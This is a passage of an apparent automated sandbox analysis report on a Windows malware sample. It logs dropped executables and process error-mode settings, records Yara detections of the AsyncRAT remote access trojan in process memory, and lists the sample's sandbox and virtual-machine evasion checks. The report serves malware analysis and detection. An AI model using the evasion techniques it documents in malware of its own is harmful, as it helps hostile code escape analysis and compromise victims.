                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\System32\wscript.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\GuardTech Solutions\AchillesGuard.comProcess information set: FAILCRITICALERRORS | NOALIGNMENTFAULTEXCEPT | NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1074999001\33c3d7c7bd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\SysWOW64\WerFault.exeProcess information set: NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX
                                Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeProcess information set: NOALIGNMENTFAULTEXCEPT | NOOPENFILEERRORBOX

                                Malware Analysis System Evasion

                                barindex
                                Yara detected AsyncRAT
                                Source: Yara matchFile source: 29.3.Macromedia.com.4985ad0.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.499e4c0.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.499e4c0.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.3c531d8.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.4985ad0.0.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.4985ad0.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.1388a80.4.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.3cc3670.2.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.3c531d8.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.499e4c0.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.1388a80.3.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.499e4c0.3.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 29.3.Macromedia.com.4985ad0.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.3cc3670.2.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.3cc3670.1.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 49.2.MSBuild.exe.1400000.0.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 34.3.AchillesGuard.com.3cc3670.1.raw.unpack, type: UNPACKEDPE
                                Source: Yara matchFile source: 0000001D.00000003.22787007755.000000000499E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22786943881.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22728218550.000000000497A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22728551295.0000000004985000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22790546318.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22738889698.0000000003C4D000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22787546897.00000000049C4000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22787323796.0000000001C6B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22730365513.00000000048FD000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000002.22807614059.00000000049C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22790546318.00000000049BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22730600015.0000000004994000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22728218550.000000000490B000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22787007755.0000000004986000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22795694035.0000000003C4E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22739051213.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22795694035.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22799081360.00000000013A8000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22795694035.0000000003C5E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22787007755.00000000049BB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22730431193.00000000049AA000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22738889698.0000000003CC3000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22728329557.0000000004991000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22739207245.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 0000001D.00000003.22787007755.00000000049AB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22739051213.00000000013AD000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000031.00000002.22834742123.0000000001402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: 00000022.00000003.22799002107.0000000001389000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
                                Source: Yara matchFile source: Process Memory Space: Macromedia.com PID: 3540, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: AchillesGuard.com PID: 2308, type: MEMORYSTR
                                Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 1884, type: MEMORYSTR
                                Found API chain indicative of sandbox detection
                                Source: C:\Users\user\Desktop\QkRFz2sau5.exeSandbox detection routine: GetForegroundWindow, DecisionNode, Sleepgraph_0-97965
                                Queries sensitive video device information (via WMI, Win32_VideoController, often done to detect virtual machines)
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeWMI Queries: IWbemServices::ExecQuery - ROOT\CIMV2 : SELECT * FROM Win32_VideoController
                                Query firmware table information (likely to detect VMs)
                                Source: C:\Users\user\AppData\Local\Temp\1074996001\9c1024a1f1.exeSystem information queried: FirmwareTableInformation
                                Source: C:\Users\user\AppData\Local\Temp\1075000001\f891ed3167.exeSystem information queried: FirmwareTableInformation
                                Source: C:\Users\user\AppData\Local\Temp\1075001001\f8e8a2d2f0.exeSystem information queried: FirmwareTableInformation
                                Tries to detect sandboxes / dynamic malware analysis system (registry check)
